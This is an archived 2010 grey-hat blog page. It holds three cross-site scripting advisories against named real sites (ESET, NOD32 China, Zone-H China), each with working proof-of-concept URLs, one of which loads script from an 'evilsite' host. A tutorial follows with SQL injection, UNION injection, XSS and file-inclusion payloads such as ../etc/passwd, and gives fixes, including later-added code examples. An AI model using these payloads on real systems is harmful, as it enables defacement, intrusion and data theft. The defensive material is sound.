Archive for the Papers Category

[whitepaper] ESET Cross Site Scripting Exploit

Posted in Papers on January 4, 2010 by Sora

___________ _______________________________
\_   _____//   _____/\_   _____/\__    ___/
|    __)_ \_____  \  |    __)_   |    |
|        \/        \ |        \  |    |   http://www.eset.com/
|
/_______  /_______  //_______  /  |____|
\/        \/         \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://search.eset.com/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http://search.eset.com/ suffers from a remote cross site scripting vulnerability, which can be used to
scam users out of information and to execute malicious JavaScript that might remotely download a file to the
victim's PC.

————————-
3. PROOF OF CONCEPT     |
————————-
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox%5B%5D=en-US

Pretty much owned? >:D

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora


[whitepaper] NOD32 (CN) Cross Site Scripting Vulnerability

Posted in Papers on January 4, 2010 by Sora

.___________  ________  http://www.nod32.com.cn
____   ____   __| _/\_____  \ \_____  \    ____   ____
/    \ /  _ \ / __ |   _(__  <  /  ____/   _/ ___\ /    \
|   |  (  <_> ) /_/ |  /       \/       \   \  \___|   |  \
|___|  /\____/\____ | /______  /\_______ \ / \___  >___|  /
\/            \/        \/         \/ \/   \/     \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

————————-
1. INFORMATION          |
————————-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————-
2. DESCRIPTION          |
————————-

http://www.nod32.com.cn suffers from a remote cross site scripting vulnerability, which can be used to
scam users out of information and to execute malicious JavaScript that might remotely download a file to the
victim's PC.

————————-
3. PROOF OF CONCEPT     |
————————-
Display a message using HTML:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src="http://www.evilsite.com/foo.js"><h2>Error</h2>&btnG=

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

[whitepaper] Zone-H (CN) XSS Vulnerability

Posted in Papers on January 4, 2010 by Sora

.__
____________   ____   ____           |  |__               ____   ____
\___   /  _ \ /    \_/ __ \   ______ |  |  \    ______  _/ ___\ /    \
/    (  <_> )   |  \  ___/  /_____/ |   Y  \  /_____/  \  \___|   |  \
/_____ \____/|___|  /\___  >         |___|  /            \___  >___|  /
\/          \/     \/               \/                 \/     \/
> Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

————————
1. INFORMATION         |
————————
Site: http://www.zone-h.com.cn/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————
2. DESCRIPTION         |
————————
http://www.zone-h.com.cn/ suffers from a cross site scripting vulnerability. This vulnerability can be exploited in many ways.
An example is creating a form to scam other people, or executing malicious JavaScript code on the victim's computer.

————————
3. PROOF OF CONCEPT    |
————————

HTML Code:
http://www.zone-h.com.cn/index.php?key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+%5Bat%5D+hotmail+%5Bdot%5D+com%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – https://greyhathackers.wordpress.com – Sora

Blocking Common Web Attacks

Posted in Papers on January 3, 2010 by Sora

>——————————————————-<
_________
/   _____/ ________________   https://greyhathackers.wordpress.com/
\_____  \ /  _ \_  __ \__  \
/        (  <_> )  | \// __ \_
/_______  /\____/|__|  (____  / presents . . .
\/     ^-^          \/
>——————————————————-<

[ INFORMATION ]

Title: Blocking Common Web Attacks
Author: Sora
Contact: vhr95zw [at] hotmail [dot] com
Website: https://greyhathackers.wordpress.com/

[ END OF INFORMATION ]
>——————————————————-<

[ TABLE OF CONTENTS ]

0x00: Introduction
0x01: SQL Injection
\_ 0x01a: Login Form Bypassing
\_ 0x01b: UNION SQL Injection
0x02: Cross Site Scripting
\_ 0x02a: Cross Site Request Forgery
0x03: File Inclusion
\_ 0x03a: Remote File Inclusion and Remote Code Execution
0x04: Conclusion, credits, and greetz

[ TABLE OF CONTENTS END ]
>——————————————————-<

0x00: Introduction

This article will tell you about five types of common web attacks, which are used
in most defacements and database dumps. The five exploits listed in the table of
contents are SQL injection, XSS, RCE, RFI, and LFI. Most of the time, it is
poor programming of the PHP code that allows the hacker to get through.

>——————————————————-<

0x01: SQL Injection

\_ 0x01a: LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:
<form action="login.php" method="POST">
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// EXAMPLE CODE (deliberately vulnerable: the submitted password is pasted straight into the SQL text)
$execute = "SELECT * FROM database WHERE password = '{$_POST['pass']}'";
$result = mysql_query($execute);
?>

We can simply bypass this by entering the password  ' or '1=1  , which makes the query execute  password = '' or '1=1'  , a condition that is always true.

Alternatively, the user can also try to delete the table by entering  ' drop table database; --  .

[+] PREVENTION:

Use mysql_real_escape_string in your PHP code, so that quote characters in the input cannot terminate the string literal.

Example:
<?php
// EXAMPLE CODE: escape the untrusted value before placing it inside the quoted SQL literal.
// mysql_real_escape_string needs an open mysql_connect() connection (assumed here).
$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword);
$message = "SELECT * FROM database WHERE password = '$badword'";
echo "Blocked: " . $message;
?>

\_ 0x01b: UNION SQL Injection

UNION SQL injection is when the attacker uses the UNION command. The attacker checks for the vulnerability by
adding a single quote (') to the end of a ".php?id=" parameter value. If the page comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to count the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1'
You have an error in your SQL syntax near '' at line 1 SELECT SUM(quantity) as type FROM orders where (status='completed' OR status='confirmed' OR status='pending') AND user_id=1'

http://www.site.com/website.php?id=1 ORDER BY 1--   <-- No error.
http://www.site.com/website.php?id=1 ORDER BY 2--   <-- Ordering by two columns comes back with an error! This means that there is only one column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()--   <-- Selects all the columns and executes version() in the only column.

[+] SOLUTION:

Add something like the code below to prevent UNION SQL injection: it strips the keywords a UNION attack needs from the parameter before it is used.

// The ereg* functions were removed in PHP 7; the same case-insensitive pattern for preg_replace.
$evil = '/(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(\/\*)|(select)/i';
$patch = preg_replace($evil, '', $_GET['id']);
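Both the escaping fix in 0x01a and the keyword filter in 0x01b try to make dangerous input harmless after it has already become part of the SQL text. The example below is added here and is not code from the original article; it shows the alternative a defender would normally reach for, a parameterized query, applied to both cases: the login check of 0x01a and the integer id lookup of 0x01b. The `users` table with its `username` and `password_hash` columns, the `orders` table, the username field (the article's form only has a password) and the connection credentials are all assumptions for the example.

```php
<?php
// Added example (not from the original article): parameterized queries with PDO instead of
// escaping or keyword blacklists. The `users`/`orders` tables, their columns, and the
// connection details below are hypothetical.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // the server binds the values, not the driver
]);

// 0x01a: the password never becomes part of the SQL text, so "' or '1=1" is compared
// as a literal string and the tautology is never parsed as SQL.
function authenticate(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    // Compare against a stored hash rather than a stored plaintext password.
    return $hash !== false && password_verify($password, $hash);
}

// 0x01b: an id is an integer, so reject anything that is not one before it reaches SQL
// and bind it as an integer. "1'", "1 ORDER BY 2--" and "-1 UNION SELECT ..." all fail
// the validation step; nothing in them is ever sent to MySQL.
function orderTotal(PDO $pdo, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        exit('invalid id');
    }
    $stmt = $pdo->prepare(
        'SELECT SUM(quantity) AS total FROM orders
          WHERE status IN (\'completed\', \'confirmed\', \'pending\') AND user_id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchColumn();
}

// Usage with the request values the article's form and link supply.
var_dump(authenticate($pdo, $_POST['user'] ?? '', $_POST['pass'] ?? ''));
var_dump(orderTotal($pdo, $_GET['id'] ?? ''));
```

With the query text fixed at prepare time there is no keyword list to keep up to date, and a legitimate search for the word "select" or "update" is no longer mangled the way the blacklist above would mangle it.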

>——————————————————-<

0x02: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, attackers will most likely inject malicious JavaScript into it or try to
scam users by creating a form where users have to type their information in. Two types of XSS (cross site scripting) are persistent XSS
and non-persistent XSS.

Example:
http://www.site.com/search.php?q="><script>alert(/XSS by Sora - vhr95zw at hotmail dot com - https://greyhathackers.wordpress.com/)</script>

[+] SOLUTION (javascript) (Thank you, Microsoft!):

// Strips the characters most XSS payloads rely on (angle brackets, quotes, %, ;, parentheses, &, +, -).
function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}
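The RemoveBad function runs in the browser, so it only protects a visitor whose own page happens to call it; the injected link in the example above, and the search-parameter cases in the three advisories at the top of this page, never pass through it. The example below is added here and is not code from the original article: it shows the server-side fix, encoding the value at the point where it is written into HTML, for a hypothetical search.php that reflects the `q` parameter the article's example uses.

```php
<?php
// Added example (not from the original article): fix reflected XSS where the value is
// written into the HTML, rather than by stripping characters on the client.
// search.php and its markup are hypothetical; the parameter name `q` follows the article.

// Encode for an HTML text node or a double-quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Defence in depth for the whole response: even if an encoding call is missed somewhere
// else on the page, inline <script> blocks are not allowed to execute.
// (Headers must be sent before any output.)
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

$q = $_GET['q'] ?? '';

// Vulnerable: the raw value is reflected, so  q="><script>...</script>  closes the
// value attribute and the injected tag is parsed as markup.
//   echo '<input name="q" value="' . $q . '">';

// Fixed: the same input is rendered as literal text. For the article's payload the
// browser displays  "><script>alert(...)</script>  inside the box instead of running it.
echo '<input name="q" value="' . h($q) . '">' . "\n";
echo '<p>Results for: ' . h($q) . '</p>' . "\n";
```

The encoding is chosen for the context it is used in (HTML body and attribute here); a value placed inside a JavaScript string or a URL needs a different encoder, which is why the fix belongs next to the output statement rather than at the input.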

>——————————————————-<

0x03: File Inclusion

\_ 0x03a: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). Most websites have patched this, but some are still
vulnerable. RFI usually leads to remote code execution or JavaScript execution.

Example of the vulnerable code:
<?php
// EXAMPLE CODE (deliberately vulnerable: the included path comes straight from the query string)
include($_GET['page']);
?>

Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/evil.txt?

[+] SOLUTION:
Validate the input: only include a page if it is on the list of allowed files.
<?php
$page = $_GET['page'];
$allowed = array('index.php', 'games.php', 'ip.php');
$iplogger = 'ip.php';
if (in_array($page, $allowed, true)) {
    include $page;
} else {
    // Anything not on the list is treated as an attack: log the visitor and stop.
    include $iplogger;
    die("IP logged.");
}
?>

For remote code execution, the site would have to pass user input to a PHP command-execution function. You would patch this in much the same way, by validating the input against a list of allowed values.
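The allow-list above still passes the request value itself to include(). The example below is added here and is not code from the original article; it goes one step further by using the parameter only as a key into a fixed table, so the value from the request never becomes a path at all, and it checks the resolved file against a fixed directory. The page names, the pages/ directory and the logging are assumptions for the example.

```php
<?php
// Added example (not from the original article): resolve the `page` parameter through a
// fixed lookup table so the request value is never used as a path. The page names and the
// pages/ directory are hypothetical.
$pages = [
    'index' => 'index.php',
    'games' => 'games.php',
];
$base = realpath(__DIR__ . '/pages');
if ($base === false) {
    http_response_code(500);
    exit('Page directory missing.');
}

$key = $_GET['page'] ?? 'index';
if (!isset($pages[$key])) {
    // "../../../../etc/passwd" and "http://www.site.com/evil.txt?" are not keys in the
    // table, so they never reach include(). Log the attempt and answer with a 404.
    error_log('rejected page parameter: ' . $key);
    http_response_code(404);
    exit('No such page.');
}

// Belt and braces: even a table entry must resolve inside $base (guards against a
// mistyped entry or a symlink pointing outside the directory).
$file = realpath($base . '/' . $pages[$key]);
if ($file === false || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
    http_response_code(500);
    exit('Page misconfigured.');
}
include $file;

// In php.ini, allow_url_include = Off (the default) additionally stops include() from
// fetching remote URLs at all, independent of the application code.
```

Because the key is looked up rather than used, traversal sequences, null bytes and remote URLs are all rejected by the same check, and the rejection is logged so repeated probing shows up in the web server's error log.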

>——————————————————-<

0x04: Conclusion, credits, and greetz.

This pretty much sums up my tutorial about basic web protection. Hopefully your site isn’t vulnerable to these types of attacks!

Credits:
Microsoft (XSS patch)

Greetz:
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com
<c> 2010 – https://greyhathackers.wordpress.com – Sora